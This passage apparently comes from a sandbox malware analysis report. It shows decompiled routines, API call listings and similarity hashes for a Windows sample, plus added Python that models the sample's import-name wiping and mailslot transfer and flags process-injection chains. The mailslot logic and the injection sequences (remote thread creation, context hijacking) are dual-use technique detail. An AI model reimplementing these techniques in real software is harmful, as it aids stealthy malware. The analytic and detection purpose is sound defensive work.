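                # The decompile range-checks a high-bit value against SizeOfImage
                # rather than doing an ordinal lookup; that path is not modeled.
                raise NotImplementedError("high-bit thunk entry")
            func = cstr(entry + 2)                  # `_t28 + 2` skips the hint
            addr = get_proc_address(module, func)
            if addr is None:
                status = ERROR_PROC_NOT_FOUND       # L18 -> L19: next descriptor
                break
            wipe(entry + 2)                         # function name wiped too
            struct.pack_into("<I", img, ft + 4 * idx, addr)   # `*(_v8 + _t46) = _v4`
            idx += 1
        desc += DESC_SIZE


def iat_entries(img: bytearray, import_dir: int, index: int) -> List[int]:
    """Non-zero FirstThunk slots of the index-th descriptor after resolution."""
    ft = struct.unpack_from("<I", img, import_dir + index * DESC_SIZE + 0x10)[0]
    out, i = [], 0
    while (v := struct.unpack_from("<I", img, ft + 4 * i)[0]) != 0:
        out.append(v)
        i += 1
    return out


# Stand-ins for the Win32 loader (constructed handles and addresses).
FAKE_EXPORTS = {b"KERNEL32.DLL": {b"CreateFileA": 0x7C801A28, b"WriteFile": 0x7C810E27},
                b"USER32.DLL": {b"FindWindowA": 0x7E42A7C6}}
FAKE_HANDLES = {dll: 0x10000 * (i + 1) for i, dll in enumerate(FAKE_EXPORTS)}


def fake_load_library(name: bytes) -> Optional[int]:
    return FAKE_HANDLES.get(name.upper())


def fake_get_proc_address(handle: int, func: bytes) -> Optional[int]:
    dll = next(d for d, h in FAKE_HANDLES.items() if h == handle)
    return FAKE_EXPORTS[dll].get(func)
```

Run `resolve_imports(build_import_table({b"KERNEL32.DLL": [b"CreateFileA"]}), 0, fake_load_library, fake_get_proc_address)` and then search the buffer for `b"CreateFileA"`: the IAT slot holds the stand-in address and the string is gone, which is why a dump of this sample taken after E00401389 has run has to be triaged by its API call behaviour rather than by import names.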
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
  • Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
  • Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
  • Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
  • FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
E00401033(void* _a4) {
    signed int _v8;
    long _v12;
    long _v16;
    void* _v20;
    void* _t24;
    long _t25;
    void* _t27;
    int _t32;
    long _t33;
    void* _t34;
    void* _t36;
    long _t39;

    _pop(_t41);
    _t39 = 0;   // bytes received so far
    _v8 = 0x1000;
    // max message size 0x1000, read timeout 0: ReadFile fails with ERROR_SEM_TIMEOUT while the slot is empty
    _t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
    _v16 = _t24;   // decompiler slot confusion: the handle is read back as _v20 below
    if(_t24 == 0) {   // as decompiled; CreateMailslot actually reports failure with INVALID_HANDLE_VALUE
        _t25 = GetLastError();
        _t36 = _a4;
        _v8 = _t25;
    } else {
        _t36 = E004011F2(0x1000);   // RtlAllocateHeap(0x1000) per the listing below
        if(_t36 == 0) {
            L10:
            _v8 = 8;   // ERROR_NOT_ENOUGH_MEMORY
        } else {
            do {
                _t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed; one message per read
                if(_t32 == 0) {
                    _t33 = GetLastError();
                    _v8 = _t33;
                    if(_t33 == 0x79) {   // ERROR_SEM_TIMEOUT: nothing queued yet, keep polling
                        _v16 = 0x1000;   // fake a full read so the loop condition holds
                        goto L8;
                    }
                } else {
                    _v12 = _v12 + 0x1000;   // grow the buffer by one message size per read
                    _t39 = _t39 + _v16;
                    _t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
                    _t36 = _t34;
                    if(_t36 == 0) {
                        goto L10;
                    } else {
                        _v8 = _v8 & 0x00000000;
                        goto L8;
                    }
                }
                goto L11;   // any other read error ends the transfer
                L8:
                Sleep(0x64); // executed; 100 ms between reads
            } while (_v16 == 0x1000);   // a message shorter than 0x1000 bytes marks the end of the data
        }
        L11:
        CloseHandle(_v20);
    }
    if(_v8 == 0) {
        _t27 = _a4;
         *(_t27 + 4) = _t36;   // receive buffer
         *((intOrPtr*)(_t27 + 8)) = _t39;   // total bytes received
    }
    return _v8;
}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
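The two functions above (E004010FB writing and E00401033 reading \\.\mailslot\msl0) implement a one-way transfer whose only end-of-data signal is a message shorter than 0x1000 bytes. The Python below is an added model, not the sample's code, and makes no Win32 calls: it reproduces only the chunking and termination logic of both sides, so the effect of the writer's `_t46 = _t46 + 1; _v8 = _v8 - 1` branch can be checked directly. A payload whose length is an exact multiple of 0x1000 is followed by a repeat of its last byte, the reader hands back length + 1 bytes, and without that branch the reader never stops polling.

```python
from typing import List, Optional

# Constructed model of the mailslot hand-off between E004010FB (writer) and
# E00401033 (reader) decompiled above. No Win32: only the chunking and the
# termination rule are reproduced, so this runs anywhere.

CHUNK = 0x1000            # CreateMailslotA max message size == WriteFile chunk size
ERROR_SEM_TIMEOUT = 0x79  # both sides retry on this error; it never ends the transfer


def writer_messages(payload: bytes, resend_last_byte: bool = True) -> List[bytes]:
    """Messages E004010FB would WriteFile, in order.

    Each iteration writes min(remaining, 0x1000) bytes and advances by the bytes
    written. When the payload ends exactly on a 0x1000 boundary the decompile
    backs up one byte and sends it again (`_t46 = _t46 + 1; _v8 = _v8 - 1`);
    resend_last_byte=False shows the transfer without that branch.
    """
    messages: List[bytes] = []
    offset, remaining = 0, len(payload)
    while remaining:
        n = min(remaining, CHUNK)                 # _v16 clamped to 0x1000
        messages.append(payload[offset:offset + n])
        offset += n                               # _v8 += bytes written
        remaining -= n                            # _t46 -= bytes written
        if resend_last_byte and remaining == 0 and n == CHUNK:
            remaining, offset = 1, offset - 1
    return messages


def reader_receive(messages: List[bytes]) -> Optional[bytes]:
    """What E00401033 hands back: ReadFile one message at a time, grow the heap
    buffer by 0x1000 per successful read, and loop while the last read returned
    exactly 0x1000 bytes. ERROR_SEM_TIMEOUT is treated as a full read, so the
    only exit is a short message. Returns None when the stream ends without
    one, i.e. the real reader would poll the mailslot forever.
    """
    buf = bytearray()
    capacity = CHUNK                              # initial RtlAllocateHeap(0x1000)
    for msg in messages:
        assert len(msg) <= CHUNK                  # the writer never exceeds the slot size
        buf += msg
        capacity += CHUNK                         # HeapReAlloc(..., _v12 += 0x1000)
        assert len(buf) <= capacity
        if len(msg) != CHUNK:                     # `while (_v16 == 0x1000)` fails
            return bytes(buf)
    return None


def round_trip(payload: bytes, resend_last_byte: bool = True) -> Optional[bytes]:
    """Writer followed by reader over an in-memory queue (constructed input)."""
    return reader_receive(writer_messages(payload, resend_last_byte))


if __name__ == "__main__":
    exact = bytes(range(256)) * 32                # 0x2000 bytes: lands on the boundary
    got = round_trip(exact)
    print(len(exact), "->", len(got), "bytes; trailing byte repeated:", got[-1] == exact[-1])
    print("without the resend branch the reader never stops:", round_trip(exact, False) is None)
```

The extra trailing byte means E00401593 is handed a length one larger than what E0040171F produced whenever the payload size is a multiple of 0x1000; anything that keys a detection or a carve on the exact transferred size should allow for that.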
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
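The NtAllocateVirtualMemory / NtWriteVirtualMemory / NtSetContextThread listing near the top of this section, the NtCreateSection / NtMapViewOfSection listing, and the OpenProcess / CreateRemoteThread listing just above are the same injection chain in three spellings. The Python below is an added triage helper, not part of the report: it parses Joe Sandbox "APIs" lines into structured calls, groups them per function block and flags blocks that combine a memory write or section mapping with an execution primitive, decoding the (Nt)OpenProcess access masks along the way. The sample text is copied from the listings on this page; the primitive table and the rights table are this example's own choices.

```python
import re
from typing import List, NamedTuple, Optional, Set

# Added triage helper for Joe Sandbox "APIs" listings (not part of the report).
# SAMPLE is copied from listings on this page; PRIMITIVES and PROCESS_RIGHTS
# are this example's own tables.
API_LINE = re.compile(  # "  • Api.MODULE(args), ref: 002E316A" or "  • memset.NTDLL ref: 002E38A2"
    r"^\s*\u2022\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$")

class Call(NamedTuple):
    api: str
    module: str
    args: list              # hex -> int, "?" -> None, other tokens kept as str
    ref: Optional[int]      # call-site address
    subcall: Optional[int]  # function address when listed as "Part of subcall function"

def parse_args(text: Optional[str]) -> list:
    out = []
    for tok in (text or "").split(","):
        tok = tok.strip()
        if tok:
            try:
                out.append(None if tok == "?" else int(tok, 16))
            except ValueError:
                out.append(tok)
    return out

def parse_listings(report_text: str) -> List[List[Call]]:
    """One call list per function block: 'APIs' opens it, 'Memory Dump Source' closes it."""
    groups: List[List[Call]] = []
    current = None
    for line in report_text.splitlines():
        s = line.strip()
        if s == "APIs":
            current = []
            groups.append(current)
        elif s.startswith("Memory Dump Source"):
            current = None
        elif current is not None and (m := API_LINE.match(line)):
            current.append(Call(m["api"], m["module"], parse_args(m["args"]),
                                int(m["ref"], 16) if m["ref"] else None,
                                int(m["sub"], 16) if m["sub"] else None))
    return groups

PRIMITIVES = {  # Win32 and Nt* spellings seen in these listings
    "open": {"OpenProcess", "NtOpenProcess"},
    "alloc": {"VirtualAlloc", "VirtualAllocEx", "NtAllocateVirtualMemory"},
    "write": {"WriteProcessMemory", "NtWriteVirtualMemory"},
    "map": {"NtCreateSection", "NtMapViewOfSection", "NtUnmapViewOfSection"},
    "protect": {"VirtualProtectEx", "NtProtectVirtualMemory"},
    "execute": {"CreateRemoteThread", "NtSetContextThread", "SetThreadContext",
                "ResumeThread", "NtResumeThread", "QueueUserAPC"},
}
REMOTE_THREAD = {"CreateRemoteThread", "NtCreateThreadEx", "RtlCreateUserThread"}
PROCESS_RIGHTS = [  # dwDesiredAccess bits of (Nt)OpenProcess
    (0x1, "PROCESS_TERMINATE"), (0x2, "PROCESS_CREATE_THREAD"), (0x8, "PROCESS_VM_OPERATION"),
    (0x10, "PROCESS_VM_READ"), (0x20, "PROCESS_VM_WRITE"), (0x40, "PROCESS_DUP_HANDLE"),
    (0x80, "PROCESS_CREATE_PROCESS"), (0x100, "PROCESS_SET_QUOTA"), (0x200, "PROCESS_SET_INFORMATION"),
    (0x400, "PROCESS_QUERY_INFORMATION"), (0x800, "PROCESS_SUSPEND_RESUME"),
    (0x1000, "PROCESS_QUERY_LIMITED_INFORMATION"), (0xF0000, "STANDARD_RIGHTS_REQUIRED"), (0x100000, "SYNCHRONIZE")]

def decode_process_access(mask: int) -> List[str]:
    return [name for bit, name in PROCESS_RIGHTS if (mask & bit) == bit]

def primitives(calls: List[Call]) -> Set[str]:
    return {p for c in calls for p, apis in PRIMITIVES.items() if c.api in apis}

def looks_like_injection(calls: List[Call]) -> bool:
    """A remote-thread API is decisive by itself; otherwise a write or a section
    mapping must appear together with an execution primitive in the same block."""
    if any(c.api in REMOTE_THREAD for c in calls):
        return True
    p = primitives(calls)
    return "execute" in p and bool(p & {"write", "map"})

def process_opens(calls: List[Call]) -> list:
    """(api, decoded rights) per process open: the mask is OpenProcess's 1st argument, NtOpenProcess's 2nd."""
    out = []
    for c in calls:
        idx = {"OpenProcess": 0, "NtOpenProcess": 1}.get(c.api)
        if idx is not None and len(c.args) > idx and isinstance(c.args[idx], int):
            out.append((c.api, decode_process_access(c.args[idx])))
    return out

def triage(report_text: str) -> list:
    return [{"first_ref": calls[0].ref if calls else None,
             "primitives": sorted(primitives(calls)),
             "injection": looks_like_injection(calls),
             "opens": process_opens(calls)} for calls in parse_listings(report_text)]

SAMPLE = """APIs
  • memset.NTDLL ref: 002E38A2
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
Memory Dump Source
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
Memory Dump Source
APIs
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
Memory Dump Source
"""
```

`triage(SAMPLE)` flags the first block (alloc + write + NtSetContextThread) and the third (OpenProcess with 0x1F0FFF, the pre-Vista PROCESS_ALL_ACCESS mask, followed by CreateRemoteThread) but not the section block on its own, since NtMapViewOfSection with handle 0xFFFFFFFF maps into the current process and the execution step lives in another function. Subcall lines are kept in the block they are listed under, so chains split across helpers like 002E3E68 and 002E3E27 still count; calls this table does not name (memcpy, RtlNtStatusToDosError) are parsed but contribute no primitive.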
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
